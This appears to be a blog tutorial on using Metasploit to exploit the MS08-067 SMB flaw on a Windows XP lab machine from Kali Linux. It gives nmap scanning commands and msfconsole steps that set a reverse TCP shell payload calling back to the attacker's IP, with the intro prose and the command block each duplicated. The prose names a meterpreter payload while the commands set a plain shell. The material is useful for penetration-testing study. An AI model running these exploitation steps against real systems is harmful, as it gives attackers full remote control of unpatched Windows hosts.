As most of us know or hear about the Metasploit framework from Rapid7. We will learn how to use the Metasploit Framework to exploit a well known Microsoft Windows XP SMB service vulnerability (MS-08-067) and gain full control of the Windows machine.
Target: Windows XP SP2 (IP Address) --> 192.168.43.86
Attacker: Kali machine (IP Address) --> 192.168.43.76
We have installed Windows XP SP2 and our attacking machine Kali Linux in Virtual Box machines. We have given them the bridge connectivity so that they can share a common WiFi network.
A quick Nmap scan of our network for Windows SMB service gives us our victim machine IP. We can see below our victim Windows XP has it's port 135 and 445 are opened, and that is used by Windows file sharing service SMB.
Now we will scan with NMap script to test the victim is vulnerable to the well-known vulnerability MS-08-067 (netapi).
As we can see our victim is vulnerable, now we will fire up the Metasploit console and do the rest of the exploitation part. First, we have to start the postgresql service that is used by the Metasploit framework, followed by msfconsole command.
After msfconsole gets open we can type in the Microsoft Windows exploit for MS-08-067 and set the payload to meterpreter, and then we have to set LHOST as our Kali IP address and RHOST as our victim windows IP address.
After successful exploitation, we can type in sysinfo command to check system information. Now we can use our meterpreter shell access to do whatever this payload offers us.
Lab Setup:
Attacker: Kali machine (IP Address) --> 192.168.43.76
We have installed Windows XP SP2 and our attacking machine Kali Linux in Virtual Box machines. We have given them the bridge connectivity so that they can share a common WiFi network.
A quick Nmap scan of our network for Windows SMB service gives us our victim machine IP. We can see below our victim Windows XP has it's port 135 and 445 are opened, and that is used by Windows file sharing service SMB.
root@PenTestPundit:~# nmap -Pn -sS -sV -p 135,445 192.168.43.0/24
Now we will scan with NMap script to test the victim is vulnerable to the well-known vulnerability MS-08-067 (netapi).
root@PenTestPundit:~# nmap -Pn --script smb-vuln-ms08-067.nse 192.168.43.86
As we can see our victim is vulnerable, now we will fire up the Metasploit console and do the rest of the exploitation part. First, we have to start the postgresql service that is used by the Metasploit framework, followed by msfconsole command.
root@Pentest-Pundit:~# service postgresql start
root@Pentest-Pundit:~# msfconsole
root@Pentest-Pundit:~# msfconsole
After msfconsole gets open we can type in the Microsoft Windows exploit for MS-08-067 and set the payload to meterpreter, and then we have to set LHOST as our Kali IP address and RHOST as our victim windows IP address.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.43.76
LHOST => 192.168.43.76
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.43.86
RHOST => 192.168.43.86
msf exploit(windows/smb/ms08_067_netapi) > exploit
msf exploit(windows/smb/ms08_067_netapi) >
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.43.76
LHOST => 192.168.43.76
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.43.86
RHOST => 192.168.43.86
msf exploit(windows/smb/ms08_067_netapi) > exploit
No comments:
Post a Comment